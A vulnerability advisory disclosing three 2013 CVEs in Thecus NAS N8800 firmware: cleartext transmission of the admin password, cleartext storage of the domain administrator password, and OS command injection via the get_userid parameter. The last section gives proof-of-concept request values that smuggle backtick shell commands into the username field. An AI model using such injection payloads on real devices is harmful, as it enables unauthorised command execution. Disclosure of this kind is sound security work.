CVE-2013-5669 Thecus Pain Text Admin Password

Advisory Information

Title: Thecus NAS Server N8800 Firmware 5.03.01 plain text administrative password
Date published: August 2013
Ref: CVE-2013-5669 CWE-319

Advisory Summary

The Network Attached Storage (NAS) Administration Web Page for Thecus NAS Server N8800 transmits passwords in cleartext, which allows remote attackers to sniff the administrative password.

Vendor

Thecus

Affected Software

NAS Server N8800 Firmware 5.03.01

Description of Issue

The Thecus NAS Server N8800 sends NAS administrative authentication credentials in plaintext across the network. The credentials may be disclosed to attackers with the ability to intercept network traffic, which may enable them to gain unauthorised access to the NAS administrative interface.

PoC

There is no exploit code required.

CVE-2013-5668 Thecus Domain Administrator Password Disclosure

Advisory Information

Title: Thecus NAS Server N8800 Firmware 5.03.01
Date published: August 2013
Ref: CVE-2013-5668 CWE-317

Advisory Summary

The Domain Administrator Password within the ADS/NT Support page is disclosed due to clear text storage of sensitive information within the GUI.

Vendor

Thecus

Affected Software

NAS Server N8800 Firmware 5.03.01

Description of Issue

The Domain Administrator Password within the ADS/NT Support page is disclosed due to clear text storage of sensitive information within the GUI. Any user who has access to this page is able to retrieve the ADS/NT administrator ID and password. This could enable an attacker to gain access to the domain hosting the storage server.

PoC

Attackers can use a browser to exploit these issues.

CVE-2013-5667 Thecus OS Command Injection

Advisory Information

Title: Thecus NAS Server N8800 Firmware 5.03.01 get_userid OS Command Injection
Date published: August 2013
Ref: CVE-2013-5667 CWE-78

Advisory Summary

A lack of input validation allows an attacker to execute OS commands directly on the operating system.

Vendor

Thecus

Affected Software

NAS Server N8800 Firmware 5.03.01

Description of Issue

The application accepts user input through the get_userid parameter that can be used to create OS commands that are redirected to the operating system. An attacker can use this flaw to execute arbitrary commands.

PoC

Standard request:

get_userid=1&username=admin

Response:

{“get_userid”:”1001″,”groupname”:false,”data”:[]}

Command Injection PoC:

1. Write value for user admin to /tmp

get_userid=1&username=admin`echo+admin+>+/tmp/xpto`

2. Display value of /tmp

get_userid=1&username=`cat+/tmp/xpto`

Response:

{“get_userid”:”1001″,”groupname”:false,”data”:[]}